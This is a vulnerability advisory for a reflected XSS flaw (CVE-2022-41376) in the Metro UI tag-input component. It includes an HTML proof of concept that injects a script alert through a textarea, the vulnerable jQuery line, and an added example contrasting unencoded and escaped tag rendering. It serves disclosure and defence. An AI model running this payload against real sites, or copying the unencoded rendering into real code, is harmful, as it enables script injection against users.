CVE-2022-41376: Metro UI v4.4.0 Components Library Reflected XSS Injection

Metro UI v4.4.0 to v4.5.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the JavaScript function.

2022-09-23 18:38:30 alicangonullu 51 seconds 32 PDF

# Exploit Title: Metro UI v4.4.0 Components Library Reflected XSS Injection

# Date: 09-19-2022

# Exploit Author: Ali Can Gonullu / Defans Security, Turkey

# Vendor Homepage: https://metroui.org.ua/intro.html

# Software Link: https://metroui.org.ua/intro.html

# Version: v4.4.0-v4.5.x (REQUIRED)

# Tested on: Windows 10 x64

# Video : https://youtu.be/_wzGVpX54Rc

PoC :

<head>
<title>Exploit PoC</title>
<link rel="stylesheet" href="https://cdn.korzh.com/metroui/v4.5.1/css/metro-all.min.css">
<script src="https://cdn.korzh.com/metroui/v4.5.1/js/metro.min.js"></script>
</head>


<body>
<textarea data-role="taginput" name="kuralicerik" cols="60" rows="10"><script>alert(0)</script>,</textarea>
</body>

Enter the exploit code into the textarea and press the comma key.

The textarea then executes the JavaScript code.

Vulnerable code :

container = $("<div>").addClass("tag-input "  + element[0].className).addClass(o.clsComponent).insertBefore(element);
element.appendTo(container);
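
Added example (not Metro UI source and not the advisory author's code): a simplified model of a comma-delimited tag input that shows the unencoded rendering pattern next to a hardened one. The function names and the `tag` / `wide` class names are assumptions made for illustration.

```javascript
// Added example: simplified model of a comma-delimited tag input (not Metro UI source).
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can break out of HTML text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Split the field value the way a tag input does: on the delimiter, dropping empty entries.
function splitTags(raw, delimiter = ",") {
  return String(raw).split(delimiter).map((t) => t.trim()).filter((t) => t.length > 0);
}

// Keep only class tokens made of letters, digits, '-' and '_' before they are
// concatenated into a class attribute.
function safeClassList(className) {
  return String(className).split(/\s+/).filter((c) => /^[A-Za-z0-9_-]+$/.test(c)).join(" ");
}

// Vulnerable pattern: tag text and class name are concatenated into markup unencoded.
function renderTagsUnsafe(raw, className) {
  const tags = splitTags(raw).map((t) => `<span class="tag">${t}</span>`).join("");
  return `<div class="tag-input ${className}">${tags}</div>`;
}

// Hardened pattern: every untrusted value is encoded for the context it lands in.
function renderTagsSafe(raw, className) {
  const tags = splitTags(raw).map((t) => `<span class="tag">${escapeHtml(t)}</span>`).join("");
  return `<div class="tag-input ${safeClassList(className)}">${tags}</div>`;
}

// Constructed input: the textarea content from the PoC above, ending with the delimiter.
const pocValue = "<script>alert(0)</script>,";
console.log(renderTagsUnsafe(pocValue, "wide")); // markup still contains a live <script> element
console.log(renderTagsSafe(pocValue, "wide"));   // tag text is rendered as inert, encoded text
```

In DOM or jQuery code the equivalent of `escapeHtml` is to set tag text with `textContent` or `.text()` instead of building HTML strings from field values.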

Related news

GHSA-633r-r4p8-pw3w: Cross site scripting in Metro UI

Metro UI v4.4.0 to v4.5.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the JavaScript function. User input is not properly sanitized before rendering in the `textarea` component.
